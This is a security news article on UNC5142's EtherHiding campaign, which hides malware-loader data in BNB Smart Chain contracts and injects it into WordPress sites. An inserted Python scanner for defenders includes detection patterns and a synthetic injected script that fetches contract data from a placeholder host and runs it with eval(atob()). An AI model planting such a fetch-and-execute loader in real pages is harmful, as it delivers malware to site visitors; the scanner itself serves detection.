Hackers Exploit Blockchain and WordPress for Malware Distribution
- John Jordan
- 52 minutes ago
Cybercriminals are increasingly leveraging blockchain technology and compromised websites to distribute malware. A financially motivated threat actor, identified as UNC5142, is using blockchain smart contracts and infected WordPress sites to spread information-stealing malware. This sophisticated technique blends legitimate Web3 activity with malicious intent, making detection and takedown efforts more challenging for security researchers.
Key Takeaways
Threat actor UNC5142 is using blockchain smart contracts and compromised WordPress sites to distribute malware.
The technique, dubbed 'EtherHiding,' embeds malicious code on public blockchains like BNB Smart Chain.
Malware includes information stealers such as Atomic, Lumma, Rhadamanthys, and Vidar, targeting Windows and macOS.
Attackers use a multi-stage JavaScript downloader called CLEARSHORT, a variant of ClearFake.
Mutable smart contract storage on the blockchain allows attackers to update payload URLs efficiently and cost-effectively.
The EtherHiding Technique
UNC5142 employs a method called 'EtherHiding,' which involves placing malicious code or data on public blockchains, such as the BNB Smart Chain. This approach allows the attackers to use decentralized systems as a resilient hosting network for their malware. Google Threat Intelligence Group (GTIG) reported that as of June 2025, approximately 14,000 web pages with injected JavaScript exhibited behavior associated with UNC5142, indicating widespread targeting of vulnerable WordPress sites.
The CLEARSHORT Infection Chain
The attack chain relies on a multi-stage JavaScript downloader named CLEARSHORT. The initial JavaScript malware, injected into WordPress plugins, themes, or databases, retrieves a second-stage payload by interacting with a malicious smart contract on the BNB Smart Chain. This smart contract then fetches a CLEARSHORT landing page, often hosted on Cloudflare .dev pages, which uses social engineering tactics like fake browser update warnings (ClickFix) to trick users into executing malicious commands. On Windows, this leads to the execution of an HTML Application (HTA) file, while on macOS, it involves running a bash command in the Terminal.
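A defender-side illustration of the first stage described above: a heuristic scanner that scores inline scripts on a WordPress page for the combination of chain RPC calls (eth_call against a contract address) and dynamic code execution (eval/atob). This is an added example, not GTIG's or the article's code; the indicator patterns, weights, RPC hostname and contract address are assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass

# Indicator patterns and weights are assumptions for illustration only;
# they are not published UNC5142 signatures.
INDICATORS = [
    ("web3_library", re.compile(r"\b(ethers|web3)\b", re.I), 1),
    ("chain_rpc_url", re.compile(r"https?://[^\s\"']*(bsc|bnb|binance)[^\s\"']*", re.I), 2),
    ("eth_call", re.compile(r"\beth_call\b"), 2),
    ("contract_address", re.compile(r"\b0x[0-9a-fA-F]{40}\b"), 1),
    ("dynamic_eval", re.compile(r"\b(eval|Function)\s*\("), 2),
    ("base64_decode", re.compile(r"\batob\s*\("), 1),
]
SCRIPT_TAG = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

@dataclass
class ScanResult:
    snippet: str  # first 60 chars of the script body, for the analyst
    score: int
    hits: list

def scan_script(js: str) -> ScanResult:
    """Score one inline script body against the indicator table."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(js)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return ScanResult(js.strip()[:60], score, hits)

def scan_page(html: str, threshold: int = 5) -> list:
    """Return inline scripts whose combined score reaches the threshold.
    RPC use, eth_call and a contract address alone are normal on a dApp;
    it is their combination with eval/atob that makes a script suspect."""
    return [r for r in map(scan_script, SCRIPT_TAG.findall(html)) if r.score >= threshold]

# Constructed sample page: one benign analytics tag and one synthetic
# injection modelled on the chain described above (placeholder values).
SAMPLE_PAGE = """
<script>window.dataLayer = window.dataLayer || [];</script>
<script>(async()=>{const r=await fetch("https://bsc-dataseed.example/",
{method:"POST",body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",
params:[{to:"0x1111111111111111111111111111111111111111",data:"0x"},"latest"]})});
const j=await r.json();eval(atob(j.result.slice(2)));})();</script>
"""

if __name__ == "__main__":
    for r in scan_page(SAMPLE_PAGE):
        print(r.score, r.hits, r.snippet)
```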
Blockchain as an Advantage for Attackers
The use of blockchain smart contracts offers significant advantages to threat actors. It allows them to blend in with legitimate Web3 activities and increases the resilience of their operations against detection and takedown efforts. UNC5142 has evolved its infrastructure, moving from a single-contract system to a more sophisticated three-smart-contract architecture. This design, based on the proxy pattern, separates router, logic, and storage functions, enabling rapid updates to critical components like landing page URLs or decryption keys without altering the code on compromised websites. These updates are cost-effective, ranging from $0.25 to $1.50 in network fees, providing considerable operational agility.
Evolving Threat Landscape
Google has not observed new UNC5142 campaigns since July 23, 2025, which could indicate a pause or a shift in their operations. However, security experts warn that this model of exploiting blockchain for malware delivery could inspire copycat attacks. The fusion of the anonymity offered by crypto ecosystems with the scalability of automated malware delivery presents a significant challenge to traditional cybersecurity defenses and takedown strategies.
Sources
Hackers Abuse Blockchain Smart Contracts to Spread Malware via Infected WordPress Sites, The Hacker News.
Google Warns of Blockchain Exploitation in Massive Malware Campaign, The420.in.